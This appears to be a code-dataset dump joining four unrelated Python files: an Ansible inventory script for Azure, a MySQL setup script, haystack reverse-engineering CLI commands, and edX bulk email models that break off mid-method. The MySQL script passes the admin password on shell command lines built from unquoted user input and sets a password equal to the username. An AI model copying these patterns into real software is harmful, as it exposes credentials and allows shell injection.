HAS_AZURE_EXC = None try: from msrestazure.azure_exceptions import CloudError from azure.mgmt.compute import __version__ as azure_compute_version from azure.common import AzureMissingResourceHttpError, AzureHttpError from azure.common.credentials import ServicePrincipalCredentials, UserPassCredentials from azure.mgmt.network.network_management_client import NetworkManagementClient from azure.mgmt.resource.resources.resource_management_client import ResourceManagementClient from azure.mgmt.compute.compute_management_client import ComputeManagementClient except ImportError as exc: HAS_AZURE_EXC = exc HAS_AZURE = False AZURE_CREDENTIAL_ENV_MAPPING = dict( profile='AZURE_PROFILE', subscription_id='AZURE_SUBSCRIPTION_ID', client_id='AZURE_CLIENT_ID', secret='AZURE_SECRET', tenant='AZURE_TENANT', ad_user='AZURE_AD_USER', password='AZURE_PASSWORD' ) AZURE_CONFIG_SETTINGS = dict( resource_groups='AZURE_RESOURCE_GROUPS', tags='AZURE_TAGS', locations='AZURE_LOCATIONS', include_powerstate='AZURE_INCLUDE_POWERSTATE', group_by_resource_group='AZURE_GROUP_BY_RESOURCE_GROUP', group_by_location='AZURE_GROUP_BY_LOCATION', group_by_security_group='AZURE_GROUP_BY_SECURITY_GROUP', group_by_tag='AZURE_GROUP_BY_TAG' ) AZURE_MIN_VERSION = "0.30.0rc5" def azure_id_to_dict(id): pieces = re.sub(r'^\/', '', id).split('/') result = {} index = 0 while index < len(pieces) - 1: result[pieces[index]] = pieces[index + 1] index += 1 return result class AzureRM(object): def __init__(self, args): self._args = args self._compute_client = None self._resource_client = None self._network_client = None self.debug = False if args.debug: self.debug = True self.credentials = self._get_credentials(args) if not self.credentials: self.fail("Failed to get credentials. Either pass as parameters, set environment variables, " "or define a profile in ~/.azure/credentials.") if self.credentials.get('subscription_id', None) is None: self.fail("Credentials did not include a subscription_id value.") self.log("setting subscription_id") self.subscription_id = self.credentials['subscription_id'] if self.credentials.get('client_id') is not None and \ self.credentials.get('secret') is not None and \ self.credentials.get('tenant') is not None: self.azure_credentials = ServicePrincipalCredentials(client_id=self.credentials['client_id'], secret=self.credentials['secret'], tenant=self.credentials['tenant']) elif self.credentials.get('ad_user') is not None and self.credentials.get('password') is not None: self.azure_credentials = UserPassCredentials(self.credentials['ad_user'], self.credentials['password']) else: self.fail("Failed to authenticate with provided credentials. Some attributes were missing. " "Credentials must include client_id, secret and tenant or ad_user and password.") def log(self, msg): if self.debug: print(msg + u'\n') def fail(self, msg): raise Exception(msg) def _get_profile(self, profile="default"): path = expanduser("~") path += "/.azure/credentials" try: config = ConfigParser.ConfigParser() config.read(path) except Exception as exc: self.fail("Failed to access {0}. Check that the file exists and you have read " "access. {1}".format(path, str(exc))) credentials = dict() for key in AZURE_CREDENTIAL_ENV_MAPPING: try: credentials[key] = config.get(profile, key, raw=True) except: pass if credentials.get('client_id') is not None or credentials.get('ad_user') is not None: return credentials return None def _get_env_credentials(self): env_credentials = dict() for attribute, env_variable in AZURE_CREDENTIAL_ENV_MAPPING.items(): env_credentials[attribute] = os.environ.get(env_variable, None) if env_credentials['profile'] is not None: credentials = self._get_profile(env_credentials['profile']) return credentials if env_credentials['client_id'] is not None or env_credentials['ad_user'] is not None: return env_credentials return None def _get_credentials(self, params): # Get authentication credentials. # Precedence: cmd line parameters-> environment variables-> default profile in ~/.azure/credentials. self.log('Getting credentials') arg_credentials = dict() for attribute, env_variable in AZURE_CREDENTIAL_ENV_MAPPING.items(): arg_credentials[attribute] = getattr(params, attribute) # try module params if arg_credentials['profile'] is not None: self.log('Retrieving credentials with profile parameter.') credentials = self._get_profile(arg_credentials['profile']) return credentials if arg_credentials['client_id'] is not None: self.log('Received credentials from parameters.') return arg_credentials # try environment env_credentials = self._get_env_credentials() if env_credentials: self.log('Received credentials from env.') return env_credentials # try default profile from ~./azure/credentials default_credentials = self._get_profile() if default_credentials: self.log('Retrieved default profile credentials from ~/.azure/credentials.') return default_credentials return None def _register(self, key): try: # We have to perform the one-time registration here. Otherwise, we receive an error the first # time we attempt to use the requested client. resource_client = self.rm_client resource_client.providers.register(key) except Exception as exc: self.log("One-time registration of {0} failed - {1}".format(key, str(exc))) self.log("You might need to register {0} using an admin account".format(key)) self.log(("To register a provider using the Python CLI: " "https://docs.microsoft.com/azure/azure-resource-manager/" "resource-manager-common-deployment-errors#noregisteredproviderfound")) @property def network_client(self): self.log('Getting network client') if not self._network_client: self._network_client = NetworkManagementClient(self.azure_credentials, self.subscription_id) self._register('Microsoft.Network') return self._network_client @property def rm_client(self): self.log('Getting resource manager client') if not self._resource_client: self._resource_client = ResourceManagementClient(self.azure_credentials, self.subscription_id) return self._resource_client @property def compute_client(self): self.log('Getting compute client') if not self._compute_client: self._compute_client = ComputeManagementClient(self.azure_credentials, self.subscription_id) self._register('Microsoft.Compute') return self._compute_client class AzureInventory(object): def __init__(self): self._args = self._parse_cli_args() try: rm = AzureRM(self._args) except Exception as e: sys.exit("{0}".format(str(e))) self._compute_client = rm.compute_client self._network_client = rm.network_client self._resource_client = rm.rm_client self._security_groups = None self.resource_groups = [] self.tags = None self.locations = None self.replace_dash_in_groups = False self.group_by_resource_group = True self.group_by_location = True self.group_by_security_group = True self.group_by_tag = True self.include_powerstate = True self._inventory = dict( _meta=dict( hostvars=dict() ), azure=[] ) self._get_settings() if self._args.resource_groups: self.resource_groups = self._args.resource_groups.split(',') if self._args.tags: self.tags = self._args.tags.split(',') if self._args.locations: self.locations = self._args.locations.split(',') if self._args.no_powerstate: self.include_powerstate = False self.get_inventory() print(self._json_format_dict(pretty=self._args.pretty)) sys.exit(0) def _parse_cli_args(self): # Parse command line arguments parser = argparse.ArgumentParser( description='Produce an Ansible Inventory file for an Azure subscription') parser.add_argument('--list', action='store_true', default=True, help='List instances (default: True)') parser.add_argument('--debug', action='store_true', default=False, help='Send debug messages to STDOUT') parser.add_argument('--host', action='store', help='Get all information about an instance') parser.add_argument('--pretty', action='store_true', default=False, help='Pretty print JSON output(default: False)') parser.add_argument('--profile', action='store', help='Azure profile contained in ~/.azure/credentials') parser.add_argument('--subscription_id', action='store', help='Azure Subscription Id') parser.add_argument('--client_id', action='store', help='Azure Client Id ') parser.add_argument('--secret', action='store', help='Azure Client Secret') parser.add_argument('--tenant', action='store', help='Azure Tenant Id') parser.add_argument('--ad-user', action='store', help='Active Directory User') parser.add_argument('--password', action='store', help='password') parser.add_argument('--resource-groups', action='store', help='Return inventory for comma separated list of resource group names') parser.add_argument('--tags', action='store', help='Return inventory for comma separated list of tag key:value pairs') parser.add_argument('--locations', action='store', help='Return inventory for comma separated list of locations') parser.add_argument('--no-powerstate', action='store_true', default=False, help='Do not include the power state of each virtual host') return parser.parse_args() def get_inventory(self): if len(self.resource_groups) > 0: # get VMs for requested resource groups for resource_group in self.resource_groups: try: virtual_machines = self._compute_client.virtual_machines.list(resource_group) except Exception as exc: sys.exit("Error: fetching virtual machines for resource group {0} - {1}".format(resource_group, str(exc))) if self._args.host or self.tags: selected_machines = self._selected_machines(virtual_machines) self._load_machines(selected_machines) else: self._load_machines(virtual_machines) else: # get all VMs within the subscription try: virtual_machines = self._compute_client.virtual_machines.list_all() except Exception as exc: sys.exit("Error: fetching virtual machines - {0}".format(str(exc))) if self._args.host or self.tags or self.locations: selected_machines = self._selected_machines(virtual_machines) self._load_machines(selected_machines) else: self._load_machines(virtual_machines) def _load_machines(self, machines): for machine in machines: id_dict = azure_id_to_dict(machine.id) # TODO - The API is returning an ID value containing resource group name in ALL CAPS. If/when it gets # fixed, we should remove the .lower(). Opened Issue # #574: https://github.com/Azure/azure-sdk-for-python/issues/574 resource_group = id_dict['resourceGroups'].lower() if self.group_by_security_group: self._get_security_groups(resource_group) host_vars = dict( ansible_host=None, private_ip=None, private_ip_alloc_method=None, public_ip=None, public_ip_name=None, public_ip_id=None, public_ip_alloc_method=None, fqdn=None, location=machine.location, name=machine.name, type=machine.type, id=machine.id, tags=machine.tags, network_interface_id=None, network_interface=None, resource_group=resource_group, mac_address=None, plan=(machine.plan.name if machine.plan else None), virtual_machine_size=machine.hardware_profile.vm_size, computer_name=(machine.os_profile.computer_name if machine.os_profile else None), provisioning_state=machine.provisioning_state, ) host_vars['os_disk'] = dict( name=machine.storage_profile.os_disk.name, operating_system_type=machine.storage_profile.os_disk.os_type.value ) if self.include_powerstate: host_vars['powerstate'] = self._get_powerstate(resource_group, machine.name) if machine.storage_profile.image_reference: host_vars['image'] = dict( offer=machine.storage_profile.image_reference.offer, publisher=machine.storage_profile.image_reference.publisher, sku=machine.storage_profile.image_reference.sku, version=machine.storage_profile.image_reference.version ) # Add windows details if machine.os_profile is not None and machine.os_profile.windows_configuration is not None: host_vars['windows_auto_updates_enabled'] = \ machine.os_profile.windows_configuration.enable_automatic_updates host_vars['windows_timezone'] = machine.os_profile.windows_configuration.time_zone host_vars['windows_rm'] = None if machine.os_profile.windows_configuration.win_rm is not None: host_vars['windows_rm'] = dict(listeners=None) if machine.os_profile.windows_configuration.win_rm.listeners is not None: host_vars['windows_rm']['listeners'] = [] for listener in machine.os_profile.windows_configuration.win_rm.listeners: host_vars['windows_rm']['listeners'].append(dict(protocol=listener.protocol, certificate_url=listener.certificate_url)) for interface in machine.network_profile.network_interfaces: interface_reference = self._parse_ref_id(interface.id) network_interface = self._network_client.network_interfaces.get( interface_reference['resourceGroups'], interface_reference['networkInterfaces']) if network_interface.primary: if self.group_by_security_group and \ self._security_groups[resource_group].get(network_interface.id, None): host_vars['security_group'] = \ self._security_groups[resource_group][network_interface.id]['name'] host_vars['security_group_id'] = \ self._security_groups[resource_group][network_interface.id]['id'] host_vars['network_interface'] = network_interface.name host_vars['network_interface_id'] = network_interface.id host_vars['mac_address'] = network_interface.mac_address for ip_config in network_interface.ip_configurations: host_vars['private_ip'] = ip_config.private_ip_address host_vars['private_ip_alloc_method'] = ip_config.private_ip_allocation_method if ip_config.public_ip_address: public_ip_reference = self._parse_ref_id(ip_config.public_ip_address.id) public_ip_address = self._network_client.public_ip_addresses.get( public_ip_reference['resourceGroups'], public_ip_reference['publicIPAddresses']) host_vars['ansible_host'] = public_ip_address.ip_address host_vars['public_ip'] = public_ip_address.ip_address host_vars['public_ip_name'] = public_ip_address.name host_vars['public_ip_alloc_method'] = public_ip_address.public_ip_allocation_method host_vars['public_ip_id'] = public_ip_address.id if public_ip_address.dns_settings: host_vars['fqdn'] = public_ip_address.dns_settings.fqdn self._add_host(host_vars) def _selected_machines(self, virtual_machines): selected_machines = [] for machine in virtual_machines: if self._args.host and self._args.host == machine.name: selected_machines.append(machine) if self.tags and self._tags_match(machine.tags, self.tags): selected_machines.append(machine) if self.locations and machine.location in self.locations: selected_machines.append(machine) return selected_machines def _get_security_groups(self, resource_group): ''' For a given resource_group build a mapping of network_interface.id to security_group name ''' if not self._security_groups: self._security_groups = dict() if not self._security_groups.get(resource_group): self._security_groups[resource_group] = dict() for group in self._network_client.network_security_groups.list(resource_group): if group.network_interfaces: for interface in group.network_interfaces: self._security_groups[resource_group][interface.id] = dict( name=group.name, id=group.id ) def _get_powerstate(self, resource_group, name): try: vm = self._compute_client.virtual_machines.get(resource_group, name, expand='instanceview') except Exception as exc: sys.exit("Error: fetching instanceview for host {0} - {1}".format(name, str(exc))) return next((s.code.replace('PowerState/', '') for s in vm.instance_view.statuses if s.code.startswith('PowerState')), None) def _add_host(self, vars): host_name = self._to_safe(vars['name']) resource_group = self._to_safe(vars['resource_group']) security_group = None if vars.get('security_group'): security_group = self._to_safe(vars['security_group']) if self.group_by_resource_group: if not self._inventory.get(resource_group): self._inventory[resource_group] = [] self._inventory[resource_group].append(host_name) if self.group_by_location: if not self._inventory.get(vars['location']): self._inventory[vars['location']] = [] self._inventory[vars['location']].append(host_name) if self.group_by_security_group and security_group: if not self._inventory.get(security_group): self._inventory[security_group] = [] self._inventory[security_group].append(host_name) self._inventory['_meta']['hostvars'][host_name] = vars self._inventory['azure'].append(host_name) if self.group_by_tag and vars.get('tags'): for key, value in vars['tags'].items(): safe_key = self._to_safe(key) safe_value = safe_key + '_' + self._to_safe(value) if not self._inventory.get(safe_key): self._inventory[safe_key] = [] if not self._inventory.get(safe_value): self._inventory[safe_value] = [] self._inventory[safe_key].append(host_name) self._inventory[safe_value].append(host_name) def _json_format_dict(self, pretty=False): # convert inventory to json if pretty: return json.dumps(self._inventory, sort_keys=True, indent=2) else: return json.dumps(self._inventory) def _get_settings(self): # Load settings from the .ini, if it exists. Otherwise, # look for environment values. file_settings = self._load_settings() if file_settings: for key in AZURE_CONFIG_SETTINGS: if key in ('resource_groups', 'tags', 'locations') and file_settings.get(key): values = file_settings.get(key).split(',') if len(values) > 0: setattr(self, key, values) elif file_settings.get(key): val = self._to_boolean(file_settings[key]) setattr(self, key, val) else: env_settings = self._get_env_settings() for key in AZURE_CONFIG_SETTINGS: if key in('resource_groups', 'tags', 'locations') and env_settings.get(key): values = env_settings.get(key).split(',') if len(values) > 0: setattr(self, key, values) elif env_settings.get(key, None) is not None: val = self._to_boolean(env_settings[key]) setattr(self, key, val) def _parse_ref_id(self, reference): response = {} keys = reference.strip('/').split('/') for index in range(len(keys)): if index < len(keys) - 1 and index % 2 == 0: response[keys[index]] = keys[index + 1] return response def _to_boolean(self, value): if value in ['Yes', 'yes', 1, 'True', 'true', True]: result = True elif value in ['No', 'no', 0, 'False', 'false', False]: result = False else: result = True return result def _get_env_settings(self): env_settings = dict() for attribute, env_variable in AZURE_CONFIG_SETTINGS.items(): env_settings[attribute] = os.environ.get(env_variable, None) return env_settings def _load_settings(self): basename = os.path.splitext(os.path.basename(__file__))[0] default_path = os.path.join(os.path.dirname(__file__), (basename + '.ini')) path = os.path.expanduser(os.path.expandvars(os.environ.get('AZURE_INI_PATH', default_path))) config = None settings = None try: config = ConfigParser.ConfigParser() config.read(path) except: pass if config is not None: settings = dict() for key in AZURE_CONFIG_SETTINGS: try: settings[key] = config.get('azure', key, raw=True) except: pass return settings def _tags_match(self, tag_obj, tag_args): ''' Return True if the tags object from a VM contains the requested tag values. :param tag_obj: Dictionary of string:string pairs :param tag_args: List of strings in the form key=value :return: boolean ''' if not tag_obj: return False matches = 0 for arg in tag_args: arg_key = arg arg_value = None if re.search(r':', arg): arg_key, arg_value = arg.split(':') if arg_value and tag_obj.get(arg_key, None) == arg_value: matches += 1 elif not arg_value and tag_obj.get(arg_key, None) is not None: matches += 1 if matches == len(tag_args): return True return False def _to_safe(self, word): ''' Converts 'bad' characters in a string to underscores so they can be used as Ansible groups ''' regex = "[^A-Za-z0-9\_" if not self.replace_dash_in_groups: regex += "\-" return re.sub(regex + "]", "_", word) def main(): if not HAS_AZURE: sys.exit("The Azure python sdk is not installed (try `pip install 'azure>=2.0.0rc5' --upgrade`) - {0}".format(HAS_AZURE_EXC)) if Version(azure_compute_version) < Version(AZURE_MIN_VERSION): sys.exit("Expecting azure.mgmt.compute.__version__ to be {0}. Found version {1} " "Do you have Azure >= 2.0.0rc5 installed? (try `pip install 'azure>=2.0.0rc5' --upgrade`)".format(AZURE_MIN_VERSION, azure_compute_version)) AzureInventory() if __name__ == '__main__': main()
gpl-3.0
7,014,954,423,921,944,000
39.834165
157
0.602156
false
4.268639
true
false
false
cria/microSICol
update_external_db.py
1
6512
#!/usr/bin/env python # -*- coding: utf-8 -*- # Author:Renato Arnellas Coelho renatoac at gmail dot com # # Script to update Sicol database # # Warning: # 1 - Add MySQL executable directory to system's PATH environment variable # 2 - This script _MUST_ be executed on root directory def updateDB(full_mode=True): ''' full_mode = whether to update only DB structure (False) or all possible data (True) @return bool - True = OK! False = Error found ''' import getpass import os import platform from sys import exit print "Updating MySQL database..." if platform.system() == "Windows" or platform.system() == "Microsoft": import winsound #################### # User data #################### dados = {} dados['mysql_login'] = raw_input("MySQL administrator login: ") dados['mysql_pwd'] = getpass.getpass("MySQL administrator password: ") dados['mysql_bd'] = raw_input("MySQL Database (e.g. 'sicol_v123'): ") dados['mysql_user'] = raw_input("Sicol login to MySQL (e.g. 'sicol'): ") #################### # Internal data #################### sicol_path = os.getcwd()+os.sep+'db'+os.sep+'scripts'+os.sep if platform.system() == "Windows" or platform.system() == "Microsoft": mysql_path = [x for x in os.environ['PATH'].split(";") if x.lower().find('mysql') != -1] else: #UNIX pipe = os.popen("which mysql") #grab where MySQL is installed mysql_path = pipe.read().strip() host = "localhost" user = dados['mysql_login'] pwd = dados['mysql_pwd'] #################### # DB update script #################### if mysql_path == '' or mysql_path == []: print "*********** ERROR ***********" print "Please insert path to executable directory (mysql.exe) in OS 'PATH' variable." raw_input() #Wait for user input... return False else: if platform.system() == "Windows" or platform.system() == "Microsoft": #Ignore whether PATH ends with '\' or not mysql_path = mysql_path[0] if mysql_path[-1] != '\\': mysql_path += '\\' mysql_path = '"' + mysql_path + 'mysql.exe"' try: bd_version = dados['mysql_bd'].split("_")[1] except Exception,e: print "*********** ERROR ***********" print "Please type \"sicol_v###\" where ### = version number." raw_input() #Wait for user input... return False path_to_db = sicol_path + bd_version + os.sep # Load mysql_script_empty.sql dump_file = 'mysql_script_empty.sql' print "Loading database structure..." try: os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) ) except Exception,e: print "*********** ERROR ***********" print str(e) raw_input() #Wait for user input... #return False # Load mysql_start_dump.sql dump_file = "dump"+os.sep+"mysql_start_dump.sql" print "Loading initial dump to database..." try: os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) ) except Exception,e: print "*********** ERROR ***********" print str(e) raw_input() #Wait for user input... return False ###################### # Load additional data ###################### if full_mode: if platform.system() == "Windows" or platform.system() == "Microsoft": winsound.MessageBeep(winsound.MB_ICONASTERISK) opt = raw_input("Do you want to load test data? (y/n)\n")[0].lower() if opt == 'y': # Load mysql_testdata_dump.sql dump_file = "dump"+os.sep+"mysql_testdata_dump.sql" print "Loading test data to database..." try: os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) ) except Exception,e: print "*********** ERROR ***********" print str(e) raw_input() #Wait for user input... return if platform.system() == "Windows" or platform.system() == "Microsoft": winsound.MessageBeep(winsound.MB_ICONASTERISK) opt = raw_input("Do you want to load all Brazilian cities name to database? (y/n)\n")[0].lower() if opt == 'y': # Load mysql_cities_dump.sql dump_file = "dump"+os.sep+"mysql_cities_dump.sql" print "Loading Brazilian cities name to database..." try: os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) ) except Exception,e: print "*********** ERROR ***********" print str(e) raw_input() #Wait for user input... return if platform.system() == "Windows" or platform.system() == "Microsoft": winsound.MessageBeep(winsound.MB_ICONASTERISK) opt = raw_input("Do you want to load debug data? (y/n)\n")[0].lower() if opt == 'y': # Load mysql_cities_dump.sql dump_file = "dump"+os.sep+"mysql_debug_dump.sql" print "Loading debug data to database..." try: os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) ) except Exception,e: print "*********** ERROR ***********" print str(e) raw_input() #Wait for user input... return ######################## # End of additional data ######################## # Give database permissions to "sicol" user print "Transfering access permission to user \"%s\"..." % dados['mysql_user'] try: #Create temp file in order to change user permissions f = open('temp_user_access_bd.sql','w') f.write("GRANT ALL PRIVILEGES ON `%s`.* TO '%s'@localhost IDENTIFIED BY '%s';FLUSH PRIVILEGES;" % (dados['mysql_bd'].replace("_","\\_"),dados['mysql_user'],dados['mysql_user'])) f.close() os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,os.getcwd()+os.sep+'temp_user_access_bd.sql') ) os.unlink('temp_user_access_bd.sql') except Exception,e: print "*********** ERROR ***********" print str(e) raw_input() #Wait for user input... return #################### # End of update #################### if platform.system() == "Windows" or platform.system() == "Microsoft": winsound.MessageBeep(winsound.MB_ICONEXCLAMATION) print "****************************" raw_input("Update finished. Press [ENTER] to continue.") #If this script is called locally... if __name__ == "__main__": print "*** Update SICol Database ***" updateDB() print "*** Update Finished ***"
gpl-2.0
2,520,255,957,991,356,000
38.447205
181
0.555129
false
3.465673
false
false
false
trolldbois/python-haystack-reverse
haystack/reverse/cli.py
1
4337
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import print_function """Entry points related to reverse. """ import os import sys from haystack import argparse_utils from haystack import cli from haystack.reverse import api # the description of the function REVERSE_DESC = 'Reverse the data structure from the process memory' REVERSE_SHOW_DESC = 'Show the record at a specific address' REVERSE_PARENT_DESC = 'List the predecessors pointing to the record at this address' REVERSE_HEX_DESC = 'Show the Hex values for the record at that address.' def show_hex(args): """ Show the Hex values for the record at that address. """ memory_handler = cli.make_memory_handler(args) process_context = memory_handler.get_reverse_context() ctx = process_context.get_context_for_address(args.address) try: st = ctx.get_record_at_address(args.address) print(repr(st.bytes)) except ValueError as e: print(None) return def show_predecessors_cmdline(args): """ Show the predecessors that point to a record at a particular address. :param args: cmdline args :return: """ memory_handler = cli.make_memory_handler(args) process_context = memory_handler.get_reverse_context() ctx = process_context.get_context_for_address(args.address) try: child_record = ctx.get_record_at_address(args.address) except ValueError as e: print(None) return records = api.get_record_predecessors(memory_handler, child_record) if len(records) == 0: print(None) else: for p_record in records: print('#0x%x\n%s\n' % (p_record.address, p_record.to_string())) return def reverse_show_cmdline(args): """ Show the record at a specific address. """ memory_handler = cli.make_memory_handler(args) process_context = memory_handler.get_reverse_context() ctx = process_context.get_context_for_address(args.address) try: st = ctx.get_record_at_address(args.address) print(st.to_string()) except ValueError: print(None) return def reverse_cmdline(args): """ Reverse """ from haystack.reverse import api as rapi # get the memory handler adequate for the type requested memory_handler = cli.make_memory_handler(args) # do the search rapi.reverse_instances(memory_handler) return def reverse(): argv = sys.argv[1:] desc = REVERSE_DESC rootparser = cli.base_argparser(program_name=os.path.basename(sys.argv[0]), description=desc) rootparser.set_defaults(func=reverse_cmdline) opts = rootparser.parse_args(argv) # apply verbosity cli.set_logging_level(opts) # execute function opts.func(opts) return def reverse_show(): argv = sys.argv[1:] desc = REVERSE_SHOW_DESC rootparser = cli.base_argparser(program_name=os.path.basename(sys.argv[0]), description=desc) rootparser.add_argument('address', type=argparse_utils.int16, help='Record memory address in hex') rootparser.set_defaults(func=reverse_show_cmdline) opts = rootparser.parse_args(argv) # apply verbosity cli.set_logging_level(opts) # execute function opts.func(opts) return def reverse_parents(): argv = sys.argv[1:] desc = REVERSE_PARENT_DESC rootparser = cli.base_argparser(program_name=os.path.basename(sys.argv[0]), description=desc) rootparser.add_argument('address', type=argparse_utils.int16, action='store', default=None, help='Hex address of the child structure') rootparser.set_defaults(func=show_predecessors_cmdline) opts = rootparser.parse_args(argv) # apply verbosity cli.set_logging_level(opts) # execute function opts.func(opts) return def reverse_hex(): argv = sys.argv[1:] desc = REVERSE_HEX_DESC rootparser = cli.base_argparser(program_name=os.path.basename(sys.argv[0]), description=desc) rootparser.add_argument('address', type=argparse_utils.int16, action='store', default=None, help='Specify the address of the record, or encompassed by the record') rootparser.set_defaults(func=show_hex) opts = rootparser.parse_args(argv) # apply verbosity cli.set_logging_level(opts) # execute function opts.func(opts) return
gpl-3.0
3,501,183,569,568,600,600
30.889706
102
0.682038
false
3.602159
false
false
false
torchingloom/edx-platform
lms/djangoapps/bulk_email/models.py
1
11002
""" Models for bulk email WE'RE USING MIGRATIONS! If you make changes to this model, be sure to create an appropriate migration file and check it in at the same time as your model changes. To do that, 1. Go to the edx-platform dir 2. ./manage.py lms schemamigration bulk_email --auto description_of_your_change 3. Add the migration file created in edx-platform/lms/djangoapps/bulk_email/migrations/ """ import logging from django.db import models, transaction from django.contrib.auth.models import User from html_to_text import html_to_text import hashlib from django.conf import settings from .fields import SeparatedValuesField log = logging.getLogger(__name__) # Bulk email to_options - the send to options that users can # select from when they send email. SEND_TO_MYSELF = 'myself' SEND_TO_STAFF = 'staff' SEND_TO_ALL = 'all' SEND_TO_LIST = 'list' SEND_TO_ALLALL = 'allall' TO_OPTIONS = [SEND_TO_MYSELF, SEND_TO_STAFF, SEND_TO_LIST, SEND_TO_ALL, SEND_TO_ALLALL] class Email(models.Model): """ Abstract base class for common information for an email. """ sender = models.ForeignKey(User, default=1, blank=True, null=True) slug = models.CharField(max_length=128, db_index=True) subject = models.CharField(max_length=128, blank=True) html_message = models.TextField(null=True, blank=True) text_message = models.TextField(null=True, blank=True) created = models.DateTimeField(auto_now_add=True) modified = models.DateTimeField(auto_now=True) class Meta: # pylint: disable=C0111 abstract = True class CourseEmail(Email): """ Stores information for an email to a course. """ # Three options for sending that we provide from the instructor dashboard: # * Myself: This sends an email to the staff member that is composing the email. # # * Staff and instructors: This sends an email to anyone in the staff group and # anyone in the instructor group # # * All: This sends an email to anyone enrolled in the course, with any role # (student, staff, or instructor) # TO_OPTION_CHOICES = ( (SEND_TO_MYSELF, 'Myself'), (SEND_TO_STAFF, 'Staff and instructors'), (SEND_TO_LIST, 'To list'), (SEND_TO_ALL, 'All'), (SEND_TO_ALLALL, 'AllAll') ) course_id = models.CharField(max_length=255, db_index=True) location = models.CharField(max_length=255, db_index=True, null=True, blank=True) to_option = models.CharField(max_length=64, choices=TO_OPTION_CHOICES, default=SEND_TO_MYSELF) to_list = SeparatedValuesField(null=True) def __unicode__(self): return self.subject @classmethod def create(cls, course_id, sender, to_option, subject, html_message, text_message=None, location=None, to_list=None): """ Create an instance of CourseEmail. The CourseEmail.save_now method makes sure the CourseEmail entry is committed. When called from any view that is wrapped by TransactionMiddleware, and thus in a "commit-on-success" transaction, an autocommit buried within here will cause any pending transaction to be committed by a successful save here. Any future database operations will take place in a separate transaction. """ # automatically generate the stripped version of the text from the HTML markup: if text_message is None: text_message = html_to_text(html_message) # perform some validation here: if to_option not in TO_OPTIONS: fmt = 'Course email being sent to unrecognized to_option: "{to_option}" for "{course}", subject "{subject}"' msg = fmt.format(to_option=to_option, course=course_id, subject=subject) raise ValueError(msg) # create the task, then save it immediately: course_email = cls( course_id=course_id, sender=sender, to_option=to_option, subject=subject, html_message=html_message, text_message=text_message, location=location, to_list=to_list, ) course_email.save_now() return course_email @transaction.autocommit def save_now(self): """ Writes CourseEmail immediately, ensuring the transaction is committed. Autocommit annotation makes sure the database entry is committed. When called from any view that is wrapped by TransactionMiddleware, and thus in a "commit-on-success" transaction, this autocommit here will cause any pending transaction to be committed by a successful save here. Any future database operations will take place in a separate transaction. """ self.save() def send(self): from instructor_task.tasks import send_bulk_course_email from instructor_task.api_helper import submit_task from instructor.utils import DummyRequest request = DummyRequest() request.user = self.sender email_obj = self to_option = email_obj.to_option task_type = 'bulk_course_email' task_class = send_bulk_course_email # Pass in the to_option as a separate argument, even though it's (currently) # in the CourseEmail. That way it's visible in the progress status. # (At some point in the future, we might take the recipient out of the CourseEmail, # so that the same saved email can be sent to different recipients, as it is tested.) task_input = {'email_id': self.id, 'to_option': to_option} task_key_stub = "{email_id}_{to_option}".format(email_id=self.id, to_option=to_option) # create the key value by using MD5 hash: task_key = hashlib.md5(task_key_stub).hexdigest() return submit_task(request, task_type, task_class, self.course_id, task_input, task_key) class Optout(models.Model): """ Stores users that have opted out of receiving emails from a course. """ # Allowing null=True to support data migration from email->user. # We need to first create the 'user' column with some sort of default in order to run the data migration, # and given the unique index, 'null' is the best default value. user = models.ForeignKey(User, db_index=True, null=True) course_id = models.CharField(max_length=255, db_index=True) class Meta: # pylint: disable=C0111 unique_together = ('user', 'course_id') # Defines the tag that must appear in a template, to indicate # the location where the email message body is to be inserted. COURSE_EMAIL_MESSAGE_BODY_TAG = '{{message_body}}' class CourseEmailTemplate(models.Model): """ Stores templates for all emails to a course to use. This is expected to be a singleton, to be shared across all courses. Initialization takes place in a migration that in turn loads a fixture. The admin console interface disables add and delete operations. Validation is handled in the CourseEmailTemplateForm class. """ html_template = models.TextField(null=True, blank=True) plain_template = models.TextField(null=True, blank=True) @staticmethod def get_template(): """ Fetch the current template If one isn't stored, an exception is thrown. """ try: return CourseEmailTemplate.objects.get() except CourseEmailTemplate.DoesNotExist: log.exception("Attempting to fetch a non-existent course email template") raise @staticmethod def _render(format_string, message_body, context): """ Create a text message using a template, message body and context. Convert message body (`message_body`) into an email message using the provided template. The template is a format string, which is rendered using format() with the provided `context` dict. This doesn't insert user's text into template, until such time we can support proper error handling due to errors in the message body (e.g. due to the use of curly braces). Instead, for now, we insert the message body *after* the substitutions have been performed, so that anything in the message body that might interfere will be innocently returned as-is. Output is returned as a unicode string. It is not encoded as utf-8. Such encoding is left to the email code, which will use the value of settings.DEFAULT_CHARSET to encode the message. """ # If we wanted to support substitution, we'd call: # format_string = format_string.replace(COURSE_EMAIL_MESSAGE_BODY_TAG, message_body) result = format_string.format(**context) # Note that the body tag in the template will now have been # "formatted", so we need to do the same to the tag being # searched for. message_body_tag = COURSE_EMAIL_MESSAGE_BODY_TAG.format() result = result.replace(message_body_tag, message_body, 1) # finally, return the result, without converting to an encoded byte array. return result def render_plaintext(self, plaintext, context): """ Create plain text message. Convert plain text body (`plaintext`) into plaintext email message using the stored plain template and the provided `context` dict. """ return CourseEmailTemplate._render(self.plain_template, plaintext, context) def render_htmltext(self, htmltext, context): """ Create HTML text message. Convert HTML text body (`htmltext`) into HTML email message using the stored HTML template and the provided `context` dict. """ return CourseEmailTemplate._render(self.html_template, htmltext, context) class CourseAuthorization(models.Model): """ Enable the course email feature on a course-by-course basis. """ # The course that these features are attached to. course_id = models.CharField(max_length=255, db_index=True, unique=True) # Whether or not to enable instructor email email_enabled = models.BooleanField(default=False) @classmethod def instructor_email_enabled(cls, course_id): """ Returns whether or not email is enabled for the given course id. If email has not been explicitly enabled, returns False. """ # If settings.FEATURES['REQUIRE_COURSE_EMAIL_AUTH'] is # set to False, then we enable email for every course. if not settings.FEATURES['REQUIRE_COURSE_EMAIL_AUTH']: return True try: record = cls.objects.get(course_id=course_id) return record.email_enabled except 